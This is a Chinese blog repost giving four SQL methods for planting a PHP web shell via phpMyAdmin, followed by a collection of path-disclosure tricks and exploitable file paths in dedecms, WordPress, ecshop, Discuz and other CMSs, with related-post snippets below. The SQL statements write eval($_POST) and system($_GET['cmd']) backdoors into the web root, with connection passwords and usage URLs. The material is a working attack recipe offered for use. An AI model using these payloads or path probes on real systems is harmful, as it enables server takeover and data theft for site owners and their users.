phpmyadmin后台4种拿shell方法及php爆路径收集

最新推荐文章于 2023-07-12 11:47:19 发布
最新推荐文章于 2023-07-12 11:47:19 发布
阅读量1.2k 收藏 2
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/amwld/archive/2011/08/31/2161276.html
版权

php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!!

方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma

方法二:
 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
 select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
 Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容:    select load_file('E:/xamp/www/s.php');

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

方法四:
 select load_file('E:/xamp/www/xiaoma.php');

 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir

 

php爆路径方法收集 :

 

1、单引号爆路径
说明:
直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。
www.xxx.com/news.php?id=149′

2、错误参数值爆路径
说明:
将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。
www.xxx.com/researcharchive.php?id=-1

3、Google爆路径
说明:
结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”

4、测试文件爆路径
说明:
很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

5、phpmyadmin爆路径
说明:
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫,也可以选择google。PS:有些BT网站会写成phpMyAdmin。
1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php

6、配置文件找路径
说明:
如果注入点有文件读取权限,就可以手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。

Windows:
c:\windows\php.ini                                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml              IIS虚拟主机配置文件

Linux:
/etc/php.ini                                           php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf                             Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf         虚拟目录配置文件

7、nginx文件类型错误解析爆路径
说明:
这是昨天无意中发现的方法,当然要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。
www.xxx.com/top.jpg/x.php

8、其他
dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

WP
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php

ecshop商城系统暴路径漏洞文件
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

ucenter爆路径
ucenter\control\admin\db.php

DZbbs
manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168爆路径
admin/inc/hack/count.php?job=list
admin/inc/hack/search.php?job=getcode
admin/inc/ajax/bencandy.php?job=do
cache/MysqlTime.txt

PHPcms2008-sp4
注册用户登陆后访问
phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog
PoC:
/go.php/<[evil code]
CMSeasy爆网站路径漏洞
漏洞出现在menu_top.php这个文件中
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

转载于:https://www.cnblogs.com/amwld/archive/2011/08/31/2161276.html

weixin_30367873
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1471
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1313
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
PHP绝对路径方法
qax
10-06 1082
1、单引号路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=149′ 2、错误参数值路径 说明: 将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。 www.xxx.com/researcharchive.php?id=-1 3、Google路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1075
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
php绝对路径方法
KHOST的博客
03-16 395
1、单引号路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxxxxx.com/news.php?id=149' 2、错误参数值路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxxxxxxxx.com/researcharch...
phpmyadminphp路径字典
11-04
phpmyadmin后台后台管理路径破,以及,php常用路径破字典
php路径方法.txt
07-18
### PHP路径方法详解 #### 一、简介 在网络安全领域,“路径”是指通过一定的技术手段尝试获取网站服务器上的目录结构或者特定文件的过程。在本篇内容中,我们将详细介绍几利用PHP进行路径方法。 #### ...
PHP绝对路径方法收集整理
10-27
PHP编程中,绝对路径(也称为泄露绝对路径)是一安全漏洞,它允许攻击者获取服务器上文件系统的完整路径,这可能导致敏感信息泄漏、权限提升或其他恶意活动。以下是一些常见的方法PHP开发人员应该了解并采取...
php中比较简单的导入phpmyadmin生成的sql文件的方法
12-19
下面将详细介绍一简单的方法来实现这一功能。 首先,我们创建一个PHP脚本,通过文件系统函数`file_get_contents`读取SQL文件的内容。例如,假设我们有一个名为`test.sql`的文件,我们可以这样获取其内容: ```...
win+apache+php+mysql+phpmyadmin环境配置方法
09-30
在搭建本地开发环境时,很多开发者会选择Windows操作系统搭配Apache、PHP、MySQL及phpMyAdmin来构建一个完整的LAMP(Linux Apache MySQL PHP)或WAMP(Windows Apache MySQL PHP)环境。本文将详细介绍如何在Windows...
PHP绝对路径方法收集
07-24
PHP绝对路径方法收集,可以学习一下啊,比较全面了
my-admin:MyAdmin后台管理系统
03-11
MyAdmin后台管理系统 介绍 该项目是一个前一级分离的项目,并基于Spring Boot,MyBatis-Plus,Shiro + JWT并合并了Activiti工作流。前端基于Vue和ElementUI,主要是一个基础平台,包含后台管理系统中所需的所有功能,可直接在此基础上进行业务功能开发 演示地址:http: 演示环境说明:演示地址当前只有工作流示例和生成代码展示可以进行增加及修改系列操作,其他功能只开放了查询操作 账号:管理员( admin ),其他用户( user1、user2、user3...具体可查看系统中用户模块) 密码:所有用户的密码都为123456 相关文档:,如果觉得写得不错或对你有帮助可以给个一键三连哈〜 原始码 的GitHub 吉蒂 提示:项目暂未完全开放,如果需要可持续关注,谢谢 项目特性 项目中内置代码生成器可以快速生成前一部分代码,并且由于使用了MyB
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
php绝对路径的几方法
weixin_30905981的博客
04-27 356
dz 绝对路径/uc_server/control/admin/db.php/ucenter/control/admin/db.php/manyou/admincp.php?my_suffix=%0A%0DTOBY57/manyou/userapp.php?%0D%0A=TOBY57WordPress的平台,绝对路径方法是:url/wp-admin/includes/admin....
php网站 绝对路径小结 - cracer_CSDN
最新发布
m0_67888657的博客
07-12 317
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能出物理路径。解决方法其实也很简单,既然我们不能减慢目标网站的速度,那我们就想办法减慢自己的速度,这样达到的效果是一样的。也很简单,只要我们找一个速度极慢的代理,挂上以后再上目标网站,就有可能将绝对路径出来。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能出物理路径。将要提交的参数值改成错误值,比如-1。
phpAdmin6.0 后台导出数据到Excel表
qq_41441669的博客
12-31 416
phpAdmin6.0 后台导出数据到excel的坑之一: 成功导出数据到excel表,必须要满足两个条件: 1,前端代码: 这个后台的前端js部分,因为js接收后台返回的数据data必须是json的数据格式,不然数据是无法导出的,只会一直转圈圈,我是php后台的,对前台不太精通,所以做项目时候卡在这里浪费很多时间。 2,接下来是后台的接口部分,接口给前端返回的数据必须是...
phpmyadmin getshell的四方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1795
phpmyadmin常见的getshell的几方法,一共是四:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 484
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三解法,解题过程七分靠技术,三分靠运气~
admin cms_login.php,迅睿CMS 后台登录
weixin_42393452的博客
03-18 1217
迅睿CMS框架默认后台登录地址是:admin.php完整模式的后台界面:此界面是完整的后台功能展示,建议开发人员和系统维护人员使用。简化模式的后台界面:/admin.php?c=home&m=min简化模式功能比较少,适用于内容维护人员使用。后台角色权限设置处可以对某些角色进行设置为:强制进入简化模式。--------如果忘记了登录地址----------这里下载admin.php文件放在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值